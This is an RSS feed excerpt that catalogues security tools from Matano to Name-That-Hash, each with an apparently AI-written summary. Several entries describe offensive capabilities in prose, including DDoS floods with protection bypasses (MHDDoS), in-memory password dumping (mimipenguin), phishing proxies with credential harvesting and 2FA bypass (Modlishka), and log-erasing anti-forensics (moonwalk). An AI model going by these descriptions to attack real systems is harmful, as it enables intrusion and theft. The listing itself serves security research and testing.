&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Matano is an open-source cloud-native security data lake specifically designed for AWS, enabling security teams to normalize and manage security logs effectively. Its notable features include the ability to integrate with over 50 log sources, support for Detection-as-Code using Python, serverless architecture for scalability, and vendor-neutral ownership through open standards. The tool aims to enhance SIEM capabilities by providing a cost-effective and versatile solution for security data management and analysis.&lt;/p&gt;</description></item><item><title>matkap</title><link>https://rainmana.github.io/hackyfeed/tools/0x6rss-matkap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0x6rss-matkap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Matkap is a cybersecurity tool designed for the analysis of malicious Telegram bots, primarily intended for educational and research purposes. It integrates with FOFA and URLScan to search for leaked bot tokens and chat IDs, allowing users to monitor and log Telegram interactions while offering functionalities to export harvest messages. Notable features include the ability to forward messages from malicious bots and comprehensive logging capabilities for monitoring bot tokens across various platforms.&lt;/p&gt;</description></item><item><title>medusa</title><link>https://rainmana.github.io/hackyfeed/tools/wisk-medusa/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wisk-medusa/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Medusa is a modular and interactive disassembler that supports Windows, Linux, and OSX platforms, tailored for analyzing various file formats such as ELF, PE, Mach-O, and GameBoy binaries. It integrates seamlessly with libraries like Boost and Qt5, offering an extensible architecture for disassembly and limited semantic analysis, particularly for specific instruction sets like x86 and GameBoy. Notable features include support for file imports and exports, varying levels of symbol handling, and the ability to work with multiple architectures and binary types.&lt;/p&gt;</description></item><item><title>metabigor</title><link>https://rainmana.github.io/hackyfeed/tools/j3ssie-metabigor/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/j3ssie-metabigor/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Metabigor is an open-source intelligence (OSINT) tool designed for various information-gathering tasks without the need for API keys. It features capabilities such as network discovery, subdomain enumeration through certificate transparency logs, IP enrichment with Shodan InternetDB, and the ability to detect CDNs or WAFs, making it versatile for cybersecurity research and analysis. Notably, it allows users to automate input processing and batch queries for efficient data collection and analysis.&lt;/p&gt;</description></item><item><title>MetaOSINT.github.io</title><link>https://rainmana.github.io/hackyfeed/tools/metaosint-metaosint.github.io/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/metaosint-metaosint.github.io/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; MetaOSINT is an open-source intelligence aggregation tool designed to assist OSINT practitioners in efficiently identifying and accessing relevant publicly available tools and resources. Its primary purpose is to streamline investigations by providing a curated list of top tools, significantly enhancing the speed and effectiveness of research and analysis. Notable features include an intuitive interface for surfacing resources and the ongoing community contribution model that allows users to submit additional tools.&lt;/p&gt;</description></item><item><title>MetaRadar</title><link>https://rainmana.github.io/hackyfeed/tools/ble-research-group-metaradar/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ble-research-group-metaradar/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; MetaRadar is a Bluetooth Low Energy (BLE) analysis tool designed for educational and security research purposes, enabling users to scan, analyze, and track nearby BLE devices. Its notable features include customizable filtering of BLE broadcasts, deep analysis of device GATT services, and real-time alerts for suspicious devices, thereby enhancing user awareness and control over device privacy. The application operates offline and does not share personal or geolocation data, emphasizing user privacy and security.&lt;/p&gt;</description></item><item><title>metarget</title><link>https://rainmana.github.io/hackyfeed/tools/metarget-metarget/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/metarget-metarget/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Metarget is a framework designed to automatically deploy vulnerable cloud-native infrastructures for security research purposes. It allows users to swiftly instantiate environments with known vulnerabilities (e.g., Docker and Kubernetes exploits) using simple command-line instructions, thus minimizing setup time for ethical hacking and testing scenarios. Notable features include the ability to &amp;ldquo;install&amp;rdquo; vulnerabilities like software packages, enabling researchers to quickly create multilayer vulnerable scenes for comprehensive testing and learning.&lt;/p&gt;</description></item><item><title>MHDDoS</title><link>https://rainmana.github.io/hackyfeed/tools/matrixtm-mhddos/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/matrixtm-mhddos/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; MHDDoS is a Python-based DDoS attack scripting tool that features 57 distinct attack methods, primarily targeting Layer 7 protocols. It offers advanced techniques such as GET and POST floods, as well as bypass mechanisms for various DDoS protection services, enabling users to perform sophisticated denial-of-service attacks while adhering to ethical guidelines. Notable capabilities include methods for random subdomains, slowloris attacks, and cookie manipulation, making it a versatile tool for testing web application resilience.&lt;/p&gt;</description></item><item><title>miasm</title><link>https://rainmana.github.io/hackyfeed/tools/cea-sec-miasm/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cea-sec-miasm/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Miasm is an open-source reverse engineering framework primarily designed for the analysis, modification, and generation of binary programs, supporting formats such as PE and ELF for both 32 and 64-bit architectures. Notable features include assembly and disassembly capabilities for various architectures like X86, ARM, and MIPS, intermediate representation for semantic analysis, JIT-based emulation, and advanced techniques for automatic de-obfuscation. The framework facilitates dynamic code analysis, making it an invaluable tool for security researchers and reverse engineers.&lt;/p&gt;</description></item><item><title>MicrosoftWontFixList</title><link>https://rainmana.github.io/hackyfeed/tools/cfalta-microsoftwontfixlist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cfalta-microsoftwontfixlist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Microsoft Wont-Fix List is a compilation of vulnerabilities and design flaws that Microsoft has identified but does not intend to address. It serves as a resource for cybersecurity professionals to be aware of potential security risks, including various types of privilege escalation and remote code execution vulnerabilities, along with details on their exploitation mechanisms. Notable features include a categorization of the vulnerabilities by attack type and associated CVEs, providing critical information for risk assessment and mitigation strategies.&lt;/p&gt;</description></item><item><title>mihari</title><link>https://rainmana.github.io/hackyfeed/tools/ninoseki-mihari/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ninoseki-mihari/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Mihari is an OSINT query aggregator designed for threat hunting, enabling users to perform multiple searches across various data services using a single rule and store the findings in a database. It supports numerous services, including Censys, VirusTotal, and Shodan, facilitating comprehensive data collection and analysis for enhanced cybersecurity investigations. Notable features include support for diverse OSINT sources, integrated persistence for findings, and robust documentation for user guidance.&lt;/p&gt;</description></item><item><title>Millennium</title><link>https://rainmana.github.io/hackyfeed/tools/steamclienthomebrew-millennium/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/steamclienthomebrew-millennium/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Millennium is an open-source low-code framework that enables users to create, manage, and utilize plugins and themes for the desktop Steam Client without complex system interactions. Key features include a TypeScript frontend and Lua backend architecture, the ability to customize themes with JavaScript and CSS, and a curated Plugin Database to ensure version compatibility and stability when enhancing the Steam experience. This framework simplifies modding for users, allowing extensive personalization while avoiding low-level code manipulation.&lt;/p&gt;</description></item><item><title>mimipenguin</title><link>https://rainmana.github.io/hackyfeed/tools/huntergregal-mimipenguin/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/huntergregal-mimipenguin/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; MimiPenguin is a Linux tool designed to extract cleartext login passwords from the currently logged-in desktop user by dumping process memory. It utilizes a probability-based method to identify possible passwords by cross-referencing hashes from the /etc/shadow file and performing regex searches. Notably, version 2.0 features a C implementation aimed at enhancing speed and portability, while it maintains support for various desktop environments and authentication types including Gnome Keyring and LightDM.&lt;/p&gt;</description></item><item><title>misconfig-mapper</title><link>https://rainmana.github.io/hackyfeed/tools/intigriti-misconfig-mapper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/intigriti-misconfig-mapper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Misconfig Mapper is a CLI tool developed by Intigriti designed to automate the detection and resolution of common security misconfigurations across various services and technologies. It leverages a flexible template-based system stored in &lt;code&gt;services.json&lt;/code&gt;, allowing users to easily add new services and perform extensive checks tailored to their specific environments. Key features include service enumeration, customizable detection templates, and the option to check only for service presence without performing misconfiguration assessments.&lt;/p&gt;</description></item><item><title>MISP</title><link>https://rainmana.github.io/hackyfeed/tools/misp-misp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/misp-misp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; MISP is an open-source threat intelligence sharing platform designed for incident analysts and cybersecurity professionals to collect, store, and share information regarding cyber threats and incidents. Its notable features include a comprehensive database for managing both technical and non-technical data, a flexible reporting system, and an automatic correlation engine that identifies relationships among threat indicators, enhancing collaboration within the security community. MISP supports integration with various security systems such as NIDS and SIEMs to facilitate efficient threat response and analysis.&lt;/p&gt;</description></item><item><title>mitaka</title><link>https://rainmana.github.io/hackyfeed/tools/ninoseki-mitaka/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ninoseki-mitaka/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Mitaka is a browser extension designed to facilitate OSINT (Open Source Intelligence) searches and scans by automating the selection and refanging of indicators of compromise (IoCs). It supports over 65 services and various IoCs including domains, email addresses, and cryptographic hashes, enhancing the efficiency of threat intelligence gathering and analysis for cybersecurity professionals. Notable features include automatic IoC parsing and integration with multiple search engines for quick data retrieval.&lt;/p&gt;</description></item><item><title>MobileApp-Pentest-Cheatsheet</title><link>https://rainmana.github.io/hackyfeed/tools/tanprathan-mobileapp-pentest-cheatsheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tanprathan-mobileapp-pentest-cheatsheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Mobile Application Penetration Testing Cheat Sheet serves as a comprehensive resource for security professionals, offering a concise compilation of essential information and checklists for mobile app penetration testing, aligned with the OWASP Mobile Risk Top 10. It encompasses detailed methodologies for both Android and iOS applications, covering aspects such as static and dynamic analysis, network security testing, and techniques for bypassing common security measures. Notable features include a section on mobile security testing distributions and frameworks, providing users with tailored tools and environments to facilitate effective security assessments.&lt;/p&gt;</description></item><item><title>Modlishka</title><link>https://rainmana.github.io/hackyfeed/tools/drk1wi-modlishka/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/drk1wi-modlishka/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Modlishka is an open-source penetration testing tool that operates as a man-in-the-middle proxy, allowing seamless proxying of multi-domain HTTP and HTTPS traffic without requiring client certificate installation. Its primary use case is in security testing, particularly for ethical phishing assessments and 2FA bypass demonstrations, providing features such as pattern-based JavaScript payload injection, user credential harvesting, and extensive support for various 2FA schemes. Additionally, Modlishka&amp;rsquo;s modular and stateless design enhances scalability, while its cross-platform compatibility ensures usability across major operating systems.&lt;/p&gt;</description></item><item><title>mongoaudit</title><link>https://rainmana.github.io/hackyfeed/tools/stampery-mongoaudit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/stampery-mongoaudit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; mongoaudit is a command-line interface tool designed for auditing MongoDB servers to identify security misconfigurations and vulnerabilities. Its primary use case is to enhance security by detecting poor configuration settings and providing actionable advice to rectify them, thus helping administrators implement best practices. Notable features include automated penetration testing capabilities and comprehensive reporting with guidance on securing MongoDB installations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;h1&gt;&lt;a href="https://mongoaud.it"&gt;&lt;img src="https://raw.githubusercontent.com/stampery/mongoaudit/master/rsc/github-header.png" alt="mongoaudit"/&gt;&lt;/a&gt;&lt;/h1&gt;
 &lt;a href="https://travis-ci.org/stampery/mongoaudit"&gt;&lt;img src="https://travis-ci.org/stampery/mongoaudit.svg?branch=master"&gt;&lt;/a&gt;
 &lt;a href="https://landscape.io/github/stampery/mongoaudit/master"&gt;&lt;img alt="Code Health" src="https://landscape.io/github/stampery/mongoaudit/master/landscape.svg?style=flat"/&gt;&lt;/a&gt;
 &lt;a href="https://codeclimate.com/repos/588f61f717e4fe24b80046f6/feed"&gt;&lt;img alt="Code Climate" src="https://codeclimate.com/repos/588f61f717e4fe24b80046f6/badges/ed691ca1655c0eb8a4a5/gpa.svg" /&gt;&lt;/a&gt;
 &lt;a href="https://codeclimate.com/repos/588f61f717e4fe24b80046f6/feed"&gt;&lt;img alt="Issue Count" src="https://codeclimate.com/repos/588f61f717e4fe24b80046f6/badges/ed691ca1655c0eb8a4a5/issue_count.svg" /&gt;&lt;/a&gt;
 &lt;br/&gt;&lt;br/&gt;
 &lt;p&gt;&lt;strong&gt;mongoaudit&lt;/strong&gt; is a CLI tool for auditing MongoDB servers, detecting poor security settings and performing automated penetration testing.&lt;/p&gt;</description></item><item><title>monkey</title><link>https://rainmana.github.io/hackyfeed/tools/guardicore-monkey/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/guardicore-monkey/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Infection Monkey is an open-source adversary emulation platform designed to enhance security postures by simulating malware behavior within a network. It employs a dual-component architecture comprising an Agent, which mimics a network worm&amp;rsquo;s propagation techniques, and a centralized command and control server, Monkey Island, for monitoring and visualization. Notable features include various exploitation methods like Log4Shell and RDP, along with adaptive strategies to assess and improve security defenses against real threats.&lt;/p&gt;</description></item><item><title>monkey365</title><link>https://rainmana.github.io/hackyfeed/tools/silverhack-monkey365/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/silverhack-monkey365/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Monkey365 is an open-source PowerShell module designed for security configuration reviews of Microsoft 365, Azure, and Microsoft Entra ID environments. It enables users to identify potential security misconfigurations and provides actionable recommendations for compliance with best practices. Notable features include its user-friendly approach that minimizes the need for in-depth knowledge of APIs and complex dashboards while facilitating comprehensive scans for security gaps.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://user-images.githubusercontent.com/5271640/181045413-1d17333c-0533-404a-91be-2070ccc6ee29.png" width="500" height="600" /&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 &lt;a href="https://github.com/silverhack/monkey365"&gt;&lt;img alt="License" src="https://img.shields.io/github/license/silverhack/monkey365"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/silverhack/monkey365"&gt;&lt;img alt="Pester" src="https://github.com/silverhack/monkey365/actions/workflows/pester.yml/badge.svg"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/silverhack/monkey365"&gt;&lt;img alt="ScriptAnalyzer" src="https://github.com/silverhack/monkey365/actions/workflows/scriptanalyzer.yml/badge.svg"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/silverhack/monkey365"&gt;&lt;img alt="Lines" src="https://img.shields.io/endpoint?url=https://ghloc.vercel.app/api/silverhack/monkey365/badge?filter=.ps1$,.psm1$&amp;style=flat&amp;logoColor=white&amp;label=Lines%20of%20Code"&gt;&lt;/a&gt;
 &lt;a href="https://twitter.com/tr1ana"&gt;&lt;img alt="Twitter" src="https://img.shields.io/twitter/follow/tr1ana?style=social"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/silverhack/monkey365/releases"&gt;&lt;img alt="GitHub Downloads" src="https://img.shields.io/github/downloads/silverhack/monkey365/total?style=flat&amp;logo=powershell&amp;label=GitHub%20Release%20Download"&gt;&lt;/a&gt;
 &lt;a href="https://www.powershellgallery.com/packages/monkey365"&gt;&lt;img alt="PowerShell Gallery" src="https://img.shields.io/powershellgallery/v/monkey365.svg?label=latest+version"&gt;&lt;/a&gt;
 &lt;a href="https://www.powershellgallery.com/packages/monkey365"&gt;&lt;img alt="PowerShell Gallery Downloads" src="https://img.shields.io/powershellgallery/dt/monkey365.svg?style=flat&amp;logo=powershell&amp;label=PSGallery%20Download"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>MonkeyDev</title><link>https://rainmana.github.io/hackyfeed/tools/alonemonkey-monkeydev/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alonemonkey-monkeydev/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; MonkeyDev is an enhanced version of iOSOpenDev designed for non-jailbroken iOS plugin development. It allows developers to easily create and inject tweaks using Xcode, offering support for CaptainHook and Logos, as well as providing tools for debugging and patching apps without jailbreaking. Notable features include automatic integration of class-dump, restore-symbol, and Reveal, as well as a private CocoaPods repository for managing non-jailbroken plugins.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="monkeydev"&gt;MonkeyDev&lt;/h1&gt;
&lt;p&gt;A modified version of iOSOpenDev&lt;/p&gt;</description></item><item><title>moonwalk</title><link>https://rainmana.github.io/hackyfeed/tools/mufeedvh-moonwalk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mufeedvh-moonwalk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Moonwalk is a lightweight tool designed for penetration testing on Unix systems, enabling users to erase their traces during exploitation by restoring system logs and filesystem timestamps to their previous state. Key features include a fast execution time of under 5 milliseconds, the ability to save and revert user shell history, and a world-writable path for session logging, ensuring that no evidence of the testing remains.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;h1&gt;&lt;code&gt;moonwalk&lt;/code&gt;&lt;/h1&gt; 
 &lt;p&gt;&lt;strong&gt;&lt;em&gt;Cover your tracks during Linux Exploitation / Penetration Testing by leaving zero traces on system logs and filesystem timestamps.&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>mosint</title><link>https://rainmana.github.io/hackyfeed/tools/alpkeskin-mosint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alpkeskin-mosint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Mosint is an automated Open Source Intelligence (OSINT) tool designed for efficient email investigations and scanning. It consolidates various services to validate emails, check for social media accounts, investigate data breaches, and extract associated information rapidly, all while being lightweight and user-friendly. Notable features include email verification, data breach checks, Pastebin scans, DNS/IP lookups, and the ability to output results in JSON format.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;img src="static/mosint-logo.png" alt="mosint" width="150px"&gt;
 &lt;br&gt;
&lt;/h1&gt;
&lt;p align="center"&gt;
&lt;a href="https://opensource.org/licenses/MIT"&gt;&lt;img src="https://img.shields.io/badge/license-MIT-_red.svg"&gt;&lt;/a&gt;
&lt;a href="https://goreportcard.com/badge/github.com/alpkeskin/mosint"&gt;&lt;img src="https://goreportcard.com/badge/github.com/alpkeskin/mosint"&gt;&lt;/a&gt;
&lt;a href="https://github.com/alpkeskin/mosint/releases"&gt;&lt;img src="https://img.shields.io/github/release/alpkeskin/mosint"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 &lt;a href="#features"&gt;Features&lt;/a&gt; •
 &lt;a href="#installation"&gt;Installation&lt;/a&gt; •
 &lt;a href="#services"&gt;Services&lt;/a&gt; •
 &lt;a href="#usage"&gt;Usage&lt;/a&gt; •
 &lt;a href="#docker"&gt;Docker&lt;/a&gt; •
 &lt;a href="#configuration-file"&gt;Config&lt;/a&gt; •
 &lt;a href="#screen"&gt;Screen&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Mr.Holmes</title><link>https://rainmana.github.io/hackyfeed/tools/lucksi-mr.holmes/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lucksi-mr.holmes/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Mr.Holmes is an OSINT information gathering tool designed for collecting data about domains, usernames, and phone numbers using publicly available resources and Google dorks. Notable features include the use of proxies for anonymous requests and integration with a WhoIS API for enhanced domain information retrieval. The tool is aimed at educational and research purposes, although accuracy may vary.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img width="650px" height="100px" src="Icon/Banner.png"&gt;
&lt;/p&gt;
&lt;p align = "center"&gt;
 &lt;img src = "https://img.shields.io/github/stars/Lucksi/Mr.Holmes"&gt;
 &lt;img src = "https://img.shields.io/github/forks/Lucksi/Mr.Holmes"&gt;
 &lt;img src = "https://img.shields.io/badge/Maintained%3F-yes-green.svg"&gt;
 &lt;img src = "https://img.shields.io/github/license/Lucksi/Mr.Holmes"&gt;
 &lt;img src = "https://img.shields.io/github/repo-size/Lucksi/Mr.Holmes"&gt;
 &lt;img src= "https://img.shields.io/github/languages/count/Lucksi/Mr.Holmes"&gt;
 &lt;img src = "https://visitor-badge.laobi.icu/badge?page_id=Lucksi.Mr.Holmes"&gt;
&lt;/p&gt;</description></item><item><title>msdat</title><link>https://rainmana.github.io/hackyfeed/tools/quentinhardy-msdat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/quentinhardy-msdat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; MSDAT (Microsoft SQL Database Attacking Tool) is an open-source penetration testing utility designed for assessing the security of Microsoft SQL databases remotely. Its primary use case includes discovering valid credentials, privilege escalation, and executing operating system commands through various SQL features. Notable features of MSDAT include the ability to perform dictionary attacks, capture SMB authentication, execute SQL requests, and manipulate files on the server, while supporting multiple Microsoft SQL Server versions.&lt;/p&gt;</description></item><item><title>mssqlproxy</title><link>https://rainmana.github.io/hackyfeed/tools/blackarrowsec-mssqlproxy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/blackarrowsec-mssqlproxy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; mssqlproxy is a lateral movement tool designed to facilitate access through a compromised Microsoft SQL Server by utilizing socket reuse. It operates with sysadmin privileges and comprises a CLR assembly, a core DLL, and a client, allowing users to install and manage proxy services for connecting to external systems. Notable features include remote DLL management, commands for file transfer, and options for configuring local listening ports, although it currently supports only IPv4 connections.&lt;/p&gt;</description></item><item><title>mtasa-blue</title><link>https://rainmana.github.io/hackyfeed/tools/multitheftauto-mtasa-blue/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/multitheftauto-mtasa-blue/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Multi Theft Auto: San Andreas (MTA) is an open-source modification that enables multiplayer gameplay for the single-player version of Grand Theft Auto: San Andreas through an advanced game engine framework. It incorporates networking and GUI rendering capabilities while allowing extensive customization via a Lua scripting language, making it possible to create custom game modes and content for multiple players. Notable features include code injection techniques for game manipulation without altering original files, a robust resource management system for asynchronous content delivery, and a collaborative community for development and support.&lt;/p&gt;</description></item><item><title>my-arsenal-of-aws-security-tools</title><link>https://rainmana.github.io/hackyfeed/tools/toniblyx-my-arsenal-of-aws-security-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/toniblyx-my-arsenal-of-aws-security-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; My Arsenal of AWS Security Tools is a curated collection of open-source tools designed to enhance security in AWS environments through various functionalities, including defensive hardening, offensive testing, and security auditing. Notable features include comprehensive coverage of cloud security best practices and continuous monitoring capabilities, facilitating improved incident response and compliance with standards such as CIS and GDPR. This repository serves as a resource for security practitioners aiming to bolster their AWS security posture.&lt;/p&gt;</description></item><item><title>MyIP</title><link>https://rainmana.github.io/hackyfeed/tools/jason5ng32-myip/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jason5ng32-myip/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; MyIP is a multifaceted IP toolbox that enables users to view and analyze their IP addresses, perform network diagnostics, and check website accessibility. Its notable features include detailed IP information retrieval, DNS leak testing, speed testing, and support for multiple languages, along with additional functionalities like proxy rule testing and a cybersecurity checklist. The tool is designed to be user-friendly, featuring dark mode, minimalist mobile optimization, and a Progressive Web App (PWA) support for enhanced accessibility.&lt;/p&gt;</description></item><item><title>MySQL_Fake_Server</title><link>https://rainmana.github.io/hackyfeed/tools/fnmsd-mysql_fake_server/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fnmsd-mysql_fake_server/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; MySQL Fake Server is a tool designed for penetration testing, specifically emulating a MySQL server to exploit vulnerabilities related to file reading and Java deserialization in MySQL JDBC clients. Notable features include the ability to read large binary files, support for custom configuration through a JSON file, and the option to preview or save the contents of read files, all implemented in pure Python 3 without external dependencies.&lt;/p&gt;</description></item><item><title>n0kovo_subdomains</title><link>https://rainmana.github.io/hackyfeed/tools/n0kovo-n0kovo_subdomains/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/n0kovo-n0kovo_subdomains/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; n0kovo_subdomains is a comprehensive subdomain enumeration wordlist containing 3,000,000 entries sourced from SSL certificate data across the entire IPv4 space. This tool is designed to enhance the efficacy of subdomain discovery activities for penetration testing and security assessments, utilizing a robust dataset that offers a balanced trade-off between size and search effectiveness. Users can leverage this highly efficient wordlist to improve the success rate of finding subdomains in various target domains.&lt;/p&gt;</description></item><item><title>Name-That-Hash</title><link>https://rainmana.github.io/hackyfeed/tools/bee-san-name-that-hash/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bee-san-name-that-hash/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Name-That-Hash is a modern hash identification tool designed to accurately identify various hash types, such as MD5 and NTLM. Its notable features include popularity ratings to prioritize common hashes, hash summaries for informed selection, accessible color output, and JSON-based API access for integration into other projects. The tool is intended to provide a more user-friendly and up-to-date alternative to older hash identification systems.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
&lt;img src="logo.gif"&gt;
&lt;p align="center"&gt;➡️ &lt;a href="http://discord.skerritt.blog"&gt;Discord&lt;/a&gt; | &lt;a href="https://nth.skerritt.blog"&gt;Website&lt;/a&gt; ⬅️&lt;/p&gt;
&lt;p align="center"&gt;The Modern Hash Identification System&lt;br&gt;
&lt;code&gt;pip3 install name-that-hash &amp;&amp; nth&lt;/code&gt;
 &lt;br&gt;
